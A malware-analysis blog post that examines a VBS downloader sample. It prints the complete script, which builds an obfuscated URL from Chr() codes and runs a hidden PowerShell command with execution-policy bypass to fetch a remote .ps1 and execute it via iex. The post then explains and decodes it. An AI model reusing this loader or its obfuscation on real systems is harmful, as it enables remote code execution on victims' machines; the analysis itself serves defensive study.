Analysis Malicious VBS Script

reversethemalware.blogspot.com · Diyar Saadi · 8 months ago · research
quality 7/10 · good
0 net
Tags
malware vbs
Analysis Malicious VBS Script Skip to main content Analysis Malicious VBS Script By Diyar Saadi | WIN32 July 14, 2025 Like PowerShell Script, VBA Script is a scripting language that is sometimes used by attackers to download the second or final stage of malware. Because in fact, VBA scripts have the ability to interact with the system and shell. What malware analysts are aware of is that VBA scripts are mostly used in Office documents or malicious macros. In this post we will discuss how to analyze VBA scripts by explaining the code and also decrypt the code encoded or encrypted by the developers of malware to bypass the programs that are used to scan devices for any malware. SHA256 : 20dcca71c02969d6c0c964e35fbacd22af83bd73f6da14657d1bbc9b7154e147 Sample : https://bazaar.abuse.ch/sample/20dcca71c02969d6c0c964e35fbacd22af83bd73f6da14657d1bbc9b7154e147 Malicious VBAScript Code : Dim wsh, http, url, method, async url = Chr(104) & "t" & Chr(116) & Chr(112) & "s" & ":" & "/" & "/" & Chr(121) & Chr(101) & Chr(116) & Chr(116) & "i" & Chr(103) & Chr(114) & "e" & "t" & Chr(114) & Chr(97) & "d" & Chr(105) & "n" & Chr(103) & "." & "c" & Chr(111) & "m" & "/" & "." & Chr(118) & "b" & Chr(115) & "/" & "1" & "7" & Chr(53) & Chr(57) & "/" & Chr(49) & "7" & "5" & "9" & "." & Chr(112) & Chr(115) & Chr(49) Set wsh = CreateObject("WScript.Shell") Set http = CreateObject("WinHttp.WinHttpRequest.5.1") method = "GET" async = False http.Open method, url, async http.Send wsh.Run "powershell -nop -exec bypass -c """"$url='" & url & "';$req=New-Object -ComObject WinHttp.WinHttpRequest.5.1;$req.Open('GET',$url,$false);$req.Send();iex $req.ResponseText""""", 0, async ' Cleanup Set wsh = Nothing Set http = Nothing Code Screenshot : Code Explanation : Malware Developer declares some variables : wsh, http, url, method, async Malware Developer used char to encode and encrypt the url that responsible to download a second stage of the malicious file . Malware Developer create an object to interact with the shell script: Set wsh = CreateObject("WScript.Shell") Malware Developer create an object to set the Windows HTPP Request : Set http = CreateObject("WinHttp.WinHttpRequest.5.1") Malware Developer used GET method to download and retrieve the file from the host that a second stage is hosted on it . Malware Developer used Powershell code to : Bypass Execution Policies , Execute . Decoding the Encoded Char : Charcode : Chr(104) & "t" & Chr(116) & Chr(112) & "s" & ":" & "/" & "/" & Chr(121) & Chr(101) & Chr(116) & Chr(116) & "i" & Chr(103) & Chr(114) & "e" & "t" & Chr(114) & Chr(97) & "d" & Chr(105) & "n" & Chr(103) & "." & "c" & Chr(111) & "m" & "/" & "." & Chr(118) & "b" & Chr(115) & "/" & "1" & "7" & Chr(53) & Chr(57) & "/" & Chr(49) & "7" & "5" & "9" & "." & Chr(112) & Chr(115) & Chr(49) Open CyebrChef.org Paste in the first right side . In Left side ( Operations ) type Find/Replace Find: Chr\((\d+)\) Replace: \x$1 From Hex ( Operations ) Result : https[://]yettigretarding[.]com/[.vbs]/1759/1759[.ps1] Comments Post a Comment
← Back to stories